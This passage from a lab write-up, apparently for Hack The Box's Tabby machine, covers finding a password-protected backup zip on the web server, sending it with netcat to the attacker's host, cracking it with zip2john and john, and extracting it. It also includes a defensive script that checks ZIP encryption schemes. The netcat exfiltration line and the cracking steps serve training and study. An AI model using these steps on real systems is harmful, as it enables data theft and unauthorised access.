Backup


Checking the web root directory after performing basic enumeration

tomcat@tabby:/var/www/html$ ll
total 48K
4.0K drwxr-xr-x 4 ash  ash  4.0K Aug 19  2021 files
4.0K drwxr-xr-x 3 root root 4.0K Aug 19  2021 ..
4.0K drwxr-xr-x 4 root root 4.0K Aug 19  2021 .
4.0K drwxr-xr-x 6 root root 4.0K Aug 19  2021 assets
 16K -rw-r--r-- 1 root root  14K Jun 17  2020 index.php
4.0K -rw-r--r-- 1 root root  123 Jun 16  2020 news.php
4.0K -rw-r--r-- 1 root root 2.9K May 21  2020 logo.png
4.0K -rw-r--r-- 1 root root 1.6K Mar 10  2016 Readme.txt
4.0K -rw-r--r-- 1 root root  766 Jan 13  2016 favicon.ico

I can see the news.php file that had the LFI vulnerability

tomcat@tabby:/var/www/html$ cd files ; ll
total 36K
4.0K drwxr-xr-x 4 ash  ash  4.0K Aug 19  2021 .
4.0K drwxr-xr-x 2 root root 4.0K Aug 19  2021 revoked_certs
4.0K drwxr-xr-x 4 root root 4.0K Aug 19  2021 ..
4.0K drwxr-xr-x 2 root root 4.0K Aug 19  2021 archive
 12K -rw-r--r-- 1 ash  ash  8.6K Jun 16  2020 16162020_backup.zip
8.0K -rw-r--r-- 1 root root 6.4K Jun 16  2020 statement

Looking into the files directory, there is an interesting archive: 16162020_backup.zip. It was picked up by PEAS earlier and appears to be a backup file for the web application. Additionally, its ownership is set to ash:ash.

tomcat@tabby:/var/www/html/files$ nc 10.10.16.5 2222 < ./16162020_backup.zip
 
┌──(kali㉿kali)-[~/…/htb/labs/tabby/backup]
└─$ nnc 2222 > 16162020_backup.zip
listening on [any] 2222 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.194] 43048

Transferring the archive to Kali for further analysis



┌──(kali㉿kali)-[~/…/htb/labs/tabby/backup]
└─$ unzip 16162020_backup.zip 
Archive:  16162020_backup.zip
   creating: var/www/html/assets/
[16162020_backup.zip] var/www/html/favicon.ico password: 

The archive is password-protected and the Tomcat credential failed. I will attempt to crack the password hash.

Password Cracking


┌──(kali㉿kali)-[~/…/htb/labs/tabby/backup]
└─$ zip2john 16162020_backup.zip > 16162020_backup.zip.hash

First, converting the encrypted archive into a hash string that john can work with

┌──(kali㉿kali)-[~/…/htb/labs/tabby/backup]
└─$ john 16162020_backup.zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it         (16162020_backup.zip)     
1g 0:00:00:00 DONE (2023-09-23 13:58) 1.666g/s 17264Kp/s 17264Kc/s 17264KC/s adzlove..adj1029
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Password hash cracked: admin@it. This password must be checked for password reuse.
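From the defender's side, the "PKZIP" format john loaded above is the legacy ZipCrypto scheme, and an archive's headers show which scheme each entry uses without needing the password. The following is an added example, not part of the original notes: it reads every entry's general-purpose flags and compression method and reports the protection scheme it advertises. The function names and the in-memory sample archive are constructed for illustration.

```python
import io
import struct
import zipfile

ENCRYPTED = 0x0001   # general-purpose flag bit 0: entry is encrypted
STRONG_ENC = 0x0040  # general-purpose flag bit 6: PKWARE strong encryption
WINZIP_AES = 99      # compression method value used by WinZip AES entries


def classify(info):
    """Return the protection scheme a ZIP entry's header advertises."""
    if not info.flag_bits & ENCRYPTED:
        return "none"
    if info.compress_type == WINZIP_AES:
        return "winzip-aes"
    if info.flag_bits & STRONG_ENC:
        return "pkware-strong"
    return "zipcrypto"  # legacy PKZIP cipher, the format john lists as "PKZIP"


def audit(archive):
    """Map each file entry (directories skipped) to its protection scheme."""
    with zipfile.ZipFile(archive) as zf:
        return {i.filename: classify(i) for i in zf.infolist() if not i.is_dir()}


def constructed_sample():
    """Constructed input: a small in-memory archive whose central directory is
    patched so entries advertise different schemes (headers only, data is plain)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in ("var/www/html/index.php", "var/www/html/news.php", "var/www/html/Readme.txt"):
            zf.writestr(name, b"constructed placeholder\n")
    raw = bytearray(buf.getvalue())
    marks = [(ENCRYPTED, None), (ENCRYPTED, WINZIP_AES), (0, None)]
    pos = -1
    for flags, method in marks:
        pos = raw.index(b"PK\x01\x02", pos + 1)      # next central directory header
        struct.pack_into("<H", raw, pos + 8, flags)  # general-purpose bit flag
        if method is not None:
            struct.pack_into("<H", raw, pos + 10, method)  # compression method
    return io.BytesIO(bytes(raw))


if __name__ == "__main__":
    for name, scheme in audit(constructed_sample()).items():
        print(f"{scheme:14} {name}")
```

Any entry reported as zipcrypto depends entirely on the strength of its password, so backups kept in a web-readable directory should be checked for it.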

Extraction


┌──(kali㉿kali)-[~/…/htb/labs/tabby/backup]
└─$ unzip 16162020_backup.zip
Archive:  16162020_backup.zip
   creating: var/www/html/assets/
[16162020_backup.zip] var/www/html/favicon.ico password: admin@it
  inflating: var/www/html/favicon.ico  
   creating: var/www/html/files/
  inflating: var/www/html/index.php  
 extracting: var/www/html/logo.png   
  inflating: var/www/html/news.php   
  inflating: var/www/html/Readme.txt  

Extracting the content with the cracked password

While it was indeed the backup file of the web application, there is not much in it.